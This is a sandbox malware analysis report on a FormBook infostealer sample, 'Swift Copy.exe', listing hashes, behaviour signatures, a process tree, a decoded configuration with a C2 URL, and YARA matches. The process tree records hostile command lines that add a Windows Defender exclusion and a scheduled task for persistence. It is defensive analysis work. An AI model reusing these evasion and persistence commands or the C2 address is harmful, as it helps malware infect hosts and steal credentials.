Edit tour

Windows Analysis Report
Swift Copy.exe

Overview

General Information

Sample Name:	Swift Copy.exe
Analysis ID:	682145
MD5:	50d4fb3f5a33007c2f80e5bbaa5e0ccd
SHA1:	26ff500d90184b5e7928cb16e92bbe0e4553e95e
SHA256:	0bacce1f09d476c0b84cd699b50152a74dd6bfd2a052749d7b5a3f4a4ae7b7d9
Tags:	exeFormbook
Infos:

Detection

FormBook

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected FormBook

Malicious sample detected (through community Yara rule)

Yara detected AntiVM3

System process connects to network (likely due to code injection or exploit)

Antivirus detection for URL or domain

Multi AV Scanner detection for dropped file

Sample uses process hollowing technique

Tries to steal Mail credentials (via file / registry access)

Uses netstat to query active network connections and open ports

Maps a DLL or memory area into another process

Writes to foreign memory regions

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Performs DNS queries to domains with low reputation

.NET source code contains potential unpacker

Injects a PE file into a foreign processes

Queues an APC in another process (thread injection)

Modifies the context of a thread in another process (thread injection)

C2 URLs / IPs found in malware configuration

Adds a directory exclusion to Windows Defender

Uses schtasks.exe or at.exe to add and modify task schedules

Tries to harvest and steal browser information (history, passwords, etc)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Antivirus or Machine Learning detection for unpacked file

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Internet Provider seen in connection with other malware

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to call native functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Sample file is different than original file name gathered from version info

Drops PE files

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

System is w10x64

Swift Copy.exe (PID: 1740 cmdline: "C:\Users\user\Desktop\Swift Copy.exe" MD5: 50D4FB3F5A33007C2F80E5BBAA5E0CCD)

powershell.exe (PID: 2300 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe MD5: DBA3E6449E97D4E3DF64527EF7012A10)

conhost.exe (PID: 2292 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

schtasks.exe (PID: 5924 cmdline: C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ImUIYlbLTIh" /XML "C:\Users\user\AppData\Local\Temp\tmpE16E.tmp MD5: 15FF7D8324231381BAD48A052F85DF04)

conhost.exe (PID: 1164 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

RegSvcs.exe (PID: 4200 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe MD5: 2867A3817C9245F7CF518524DFD18F28)

explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)

autofmt.exe (PID: 1164 cmdline: C:\Windows\SysWOW64\autofmt.exe MD5: 7FC345F685C2A58283872D851316ACC4)

NETSTAT.EXE (PID: 5496 cmdline: C:\Windows\SysWOW64\NETSTAT.EXE MD5: 4E20FF629119A809BC0E7EE2D18A7FDB)

cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.my1245.com/bwe0/"], "decoy": ["GA8abA96SLI=", "RjM/QAsrNyRPlNEjahNMdKXlPtbXpQ==", "rOQ4ySihIKVFhRnhZxfZ", "iSnyAlGXQBSBwz1C", "SYfcQ54ijGWAuQq1UQTE", "XRcVgsQIO8FVnvCOiHLvE3k=", "K2XLULRJuod6I3dO", "S4oH5i5i3+expw==", "4hZdto3RgCY9esve1k7T5x9YPw==", "fkpgXDuEv2NzvxCcq2AxMnE=", "13czFGvtsco1gf8=", "ub4KhXCsZ/qnnvYTijN3dA==", "WD5IRIcJB51Hfs8grBnldA==", "YqxA1LPudXGKyP1FlQ==", "MZHXMBdZ8Mf2X3ZjSVY=", "7mLLNhchknqdLVbz+6ci4VeD", "66OK6kmRv8N6I3dO", "+97y8jK5vTnIn8crIwyHnRxv03Kp", "PC1PqPJ6573fH0aUnGAxMnE=", "3BFlt4nJcA3Inb3TGO02bq++XzWRMVg=", "JFWj7LK++b1oRUtG", "TbxQMHrFdPd6I3dO", "ltV+Zbop3H8ufAGhzN3O", "mlcxPKADy6TjUdNgnWAxMnE=", "GZlnUCk98Q0sfdIykw==", "ejIKCEuKTCdRrCmEik4Llxxv03Kp", "oBioj+xiThlFleT8Sb2OU6jyDjWRMVg=", "FTiMDEy9JumdFnxiig==", "3F/6yw1VGOkbfvl+wLtBZ+YotQlBMKb8sw==", "gP2ZcmKh5co1gf8=", "QB0tm/t82o5NJ0/hZxfZ", "7p+eEFywCuQDNXv6UOqfYw==", "VT09fVZax5pZOWDL1JH64Ima", "6y+iWKUy3+expw==", "QsByZl2v6YY/IF87hDWDmRtv03Kp", "FMSC3UQG3+expw==", "4iZslO0xz0vUntnn/fX2k6bkRPCE3nhQsQ==", "QALQo+6BigCVFnxiig==", "tGEvL4wVB82JcsmhzN3O", "C3MpKHrHh0hV4B2p4dR3dQ==", "+jBbwhmM9K3ABEXhZxfZ", "Bgtm5ypqp4F6I3dO", "gjAL+kjz7sphJ0zhZxfZ", "XdWUftmHvYF6I3dO", "/72t+jNqjjDTEV4tbVg=", "DogcC2/11HdGqv2BEuHA", "XgwEGD8FXWErZmlI", "i0Ud7r7Ot39AkQrk3Y1frfEsNw==", "ldkwfVSeU9dkhpeknQ==", "Do9QPSpsaYJ6I3dO", "lJCssH2SnGLkU+Y=", "993QLp0nk1yDgZd1rBnldA==", "k8cWkuts5VMbaZ9quHj64Ima", "bF53yjBwIg9H", "BYcZjHa7hWAyFzAQMyg616PYPtbXpQ==", "XFSfGGr2bDP/ebB8x3Izrh5v03Kp", "A8PhVrAswln64jlMWGnQ9pXThRZ8HLyi", "yL3yWzZCyVcmpCbw7q+FFPkIFzWRMVg=", "P8yKVC56enmwYp+HpaPR", "OvT4bdZHwkTRntehzN3O", "re6GEPc19FobfNUkrBnldA==", "3JOU+kudyloQ/zcBR2FgrfEsNw==", "B/cOgMQIHPYjkynCGiG5xbYaGwQ=", "XqQpFlRw8m4bXJt0uZZ12SVNPw=="]}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1564c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb242:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e19:$sqlite3step: 68 34 1C 7B E1 0x18f4c:$sqlite3step: 68 34 1C 7B E1 0x18e5b:$sqlite3text: 68 38 2A 90 C5 0x18fa3:$sqlite3text: 68 38 2A 90 C5 0x18e72:$sqlite3blob: 68 53 D8 7F 8C 0x18fc5:$sqlite3blob: 68 53 D8 7F 8C
0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x664c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x9e19:$sqlite3step: 68 34 1C 7B E1 0x9f4c:$sqlite3step: 68 34 1C 7B E1 0x9e5b:$sqlite3text: 68 38 2A 90 C5 0x9fa3:$sqlite3text: 68 38 2A 90 C5 0x9e72:$sqlite3blob: 68 53 D8 7F 8C 0x9fc5:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.286746529.0000000002670000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xe750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x7b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x7955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x7a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x664c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xd3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0xe4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x9e19:$sqlite3step: 68 34 1C 7B E1 0x9f4c:$sqlite3step: 68 34 1C 7B E1 0x9e5b:$sqlite3text: 68 38 2A 90 C5 0x9fa3:$sqlite3text: 68 38 2A 90 C5 0x9e72:$sqlite3blob: 68 53 D8 7F 8C 0x9fc5:$sqlite3blob: 68 53 D8 7F 8C
00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1564c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb242:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e19:$sqlite3step: 68 34 1C 7B E1 0x18f4c:$sqlite3step: 68 34 1C 7B E1 0x18e5b:$sqlite3text: 68 38 2A 90 C5 0x18fa3:$sqlite3text: 68 38 2A 90 C5 0x18e72:$sqlite3blob: 68 53 D8 7F 8C 0x18fc5:$sqlite3blob: 68 53 D8 7F 8C
00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x6601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1d750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa92f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x16b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x16955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x16401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x16a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x16bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0xa4fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1564c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xb242:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1c3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1d4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18e19:$sqlite3step: 68 34 1C 7B E1 0x18f4c:$sqlite3step: 68 34 1C 7B E1 0x18e5b:$sqlite3text: 68 38 2A 90 C5 0x18fa3:$sqlite3text: 68 38 2A 90 C5 0x18e72:$sqlite3blob: 68 53 D8 7F 8C 0x18fc5:$sqlite3blob: 68 53 D8 7F 8C
00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5601:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c750:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x992f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15b57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15955:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15401:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15a57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15bcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x94fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1464c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa242:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b3a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c4ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x17e19:$sqlite3step: 68 34 1C 7B E1 0x17f4c:$sqlite3step: 68 34 1C 7B E1 0x17e5b:$sqlite3text: 68 38 2A 90 C5 0x17fa3:$sqlite3text: 68 38 2A 90 C5 0x17e72:$sqlite3blob: 68 53 D8 7F 8C 0x17fc5:$sqlite3blob: 68 53 D8 7F 8C
00000000.00000002.284828644.0000000002420000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x34da9:$a1: 3C 30 50 4F 53 54 74 09 40 0x5fdc9:$a1: 3C 30 50 4F 53 54 74 09 40 0x89de9:$a1: 3C 30 50 4F 53 54 74 09 40 0x4bef8:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x76f18:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa0f38:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x390d7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x640f7:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8e117:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x452ff:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x7031f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x9a33f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x450fd:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7011d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x9a13d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44ba9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6fbc9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x99be9:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x451ff:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7021f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9a23f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x45377:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x70397:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9a3b7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x38ca2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x63cc2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8dce2:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x43df4:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x6ee14:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x98e34:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x399ea:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x64a0a:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x8ea2a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x475c1:$sqlite3step: 68 34 1C 7B E1 0x476f4:$sqlite3step: 68 34 1C 7B E1 0x725e1:$sqlite3step: 68 34 1C 7B E1 0x72714:$sqlite3step: 68 34 1C 7B E1 0x9c601:$sqlite3step: 68 34 1C 7B E1 0x9c734:$sqlite3step: 68 34 1C 7B E1 0x47603:$sqlite3text: 68 38 2A 90 C5 0x4774b:$sqlite3text: 68 38 2A 90 C5 0x72623:$sqlite3text: 68 38 2A 90 C5 0x7276b:$sqlite3text: 68 38 2A 90 C5 0x9c643:$sqlite3text: 68 38 2A 90 C5 0x9c78b:$sqlite3text: 68 38 2A 90 C5 0x4761a:$sqlite3blob: 68 53 D8 7F 8C 0x4776d:$sqlite3blob: 68 53 D8 7F 8C 0x7263a:$sqlite3blob: 68 53 D8 7F 8C 0x7278d:$sqlite3blob: 68 53 D8 7F 8C 0x9c65a:$sqlite3blob: 68 53 D8 7F 8C 0x9c7ad:$sqlite3blob: 68 53 D8 7F 8C
Process Memory Space: Swift Copy.exe PID: 1740	JoeSecurity_AntiVM_3	Yara detected AntiVM_3	Joe Security
Process Memory Space: Swift Copy.exe PID: 1740	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x76527:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: RegSvcs.exe PID: 4200	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x28f19:$a1: 3C 30 50 4F 53 54 74 09 40
Process Memory Space: NETSTAT.EXE PID: 5496	Windows_Trojan_Formbook_1112e116	unknown	unknown	0xc25:$a1: 3C 30 50 4F 53 54 74 09 40 0x61c2:$a1: 3C 30 50 4F 53 54 74 09 40 0x8655:$a1: 3C 30 50 4F 53 54 74 09 40
Click to see the 29 entries

Unpacked PEs

Source	Rule	Description	Author	Strings
8.0.RegSvcs.exe.400000.0.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
8.0.RegSvcs.exe.400000.0.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5801:$a1: 3C 30 50 4F 53 54 74 09 40 0x1c950:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x9b2f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x15d57:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
8.0.RegSvcs.exe.400000.0.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x15b55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x15601:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x15c57:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x15dcf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x96fa:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x1484c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0xa442:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x1b5a7:$sequence_8: 3C 54 74 04 3C 74 75 F4 0x1c6ba:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
8.0.RegSvcs.exe.400000.0.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x18019:$sqlite3step: 68 34 1C 7B E1 0x1814c:$sqlite3step: 68 34 1C 7B E1 0x1805b:$sqlite3text: 68 38 2A 90 C5 0x181a3:$sqlite3text: 68 38 2A 90 C5 0x18072:$sqlite3blob: 68 53 D8 7F 8C 0x181c5:$sqlite3blob: 68 53 D8 7F 8C
0.2.Swift Copy.exe.34c7188.6.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
0.2.Swift Copy.exe.34c7188.6.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x34c21:$a1: 3C 30 50 4F 53 54 74 09 40 0x5fc41:$a1: 3C 30 50 4F 53 54 74 09 40 0x89c61:$a1: 3C 30 50 4F 53 54 74 09 40 0x4bd70:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x76d90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0xa0db0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x38f4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x63f6f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x8df8f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x45177:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x70197:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x9a1b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.Swift Copy.exe.34c7188.6.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x44f75:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6ff95:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x99fb5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x44a21:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6fa41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x99a61:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x45077:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x70097:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x9a0b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x451ef:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7020f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x9a22f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x38b1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x63b3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x8db5a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x43c6c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x6ec8c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x98cac:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8 0x39862:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x64882:$sequence_7: 66 89 0C 02 5B 8B E5 5D 0x8e8a2:$sequence_7: 66 89 0C 02 5B 8B E5 5D
